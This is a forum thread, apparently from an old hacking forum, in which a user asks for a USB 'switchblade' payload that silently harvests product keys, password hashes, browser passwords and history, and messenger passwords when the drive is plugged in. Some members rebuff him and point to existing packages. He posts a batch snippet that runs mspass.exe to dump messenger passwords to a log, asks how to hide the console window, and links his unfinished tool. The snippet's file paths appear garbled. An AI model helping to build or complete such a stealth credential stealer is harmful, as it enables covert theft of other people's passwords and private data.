Need a USB to do the following!

USBHacker

Hi Everybody!

I got a really interesting idea... can someone make (or if it has already been done, then link) some files to put onto my USB (non-U3) that will;

1. Save the product keys onto a log file

2. Save the admin (current logged in user) password or hash to a log file

3. Save IE Passwords to a log file

4. Save IE History to a log file

5. Save FF Passwords to a log file

6. Save FF History to a log file

7. Save MSN/WLM passwords to a log file

Oh yeah, and I need this to do it all, without me having to open something, I just want to plug the device (USB 'Flash' Frive) in, and let it do it's magic.  8-)

Thanks in advanced,

USBHacker

PS: I have seen a few of these things around, but ones that only do a few of these, none that do all of these. Please reply! Thanks in advanced!

But seriously, I would like some help with this!

If you know of a combination of different packages that will allow me to do this, please tell me.

nope this time you're on your own

I suggest to everyone not to help on THIS one because all of theses are already in a package for the switchblade already, a little searching and reading will tell you how to set this up. so if you really want to be a hacker and not just a skiddy do this simple one your self...

I'm sorry but your just starting to piss me off, it may be the lack of sleep but the way I see it really you are impatient and want everything answered for you. As easy as it is to hit that little new topic button you should really look, and look HARD to find your answer. You have very little knowledge about USB "hacks", I would suggest you read every sticky in the "USB Hacks" sub forum, I am aware that there are a lot of pages to go through (~37) because I have read them all myself but it will benefit you greatly. Not only will you have a greater understanding of USB "hacks" but you will also learn to become self dependent, meaning you will learn that the answers are generally in front of you if you just look. Almost everyone on this forum will be happy to help you if you ask a question that is un-answered / difficult to explain, but when asking questions that you would know the answers to if you were to just read then you begin to irritate people.

Also I'd like for you to think to yourself why do you want to use the payload? If you could truthfully answer you want to learn, then people would be much more likely to answer your questions. Unfortunately for you it's quite obvious you don't want to learn else you would have already read all the sticky's and you would have attempted to make this payload yourself.

Since I have not found a USB to do what I need it to do, I have decided to make it myself :cool:

I am trying, but I need to know some basic coding first.

1. How do I make a bat (batch) command so that they won't see the command prompt window

2. Is there a better code, cause this code looks a bit messy;

Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1

echo **********[Dump messenger PW]******* >> ....Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1

.mspass.exe /stext "....Documentslogfiles%computername%_ms.log" >> ....Documentslogfiles%computername%.log 2>&1

copy ....Documentslogfiles%computername%.log+....Documentslogfiles%computername%_ms.log* ....Documentslogfiles%computername%.log  >> nul

del /f /q "....Documentslogfiles%computername%_ms.log" >nul

Thanks in advanced,

USBHacker

Here is what I've done so far, but I've gotten a little bit stuck. I don't know why it isn't working.

http://www.mediafire.com/?bgj9m0umeak

Thanks in advanced,

USBHacker

PS: I have taken out the gmail accounts and passwords, because I don't want spam/hackers.

PPS: meiafire didn't let me upload just the zip, so I put the zip inside a rar archive.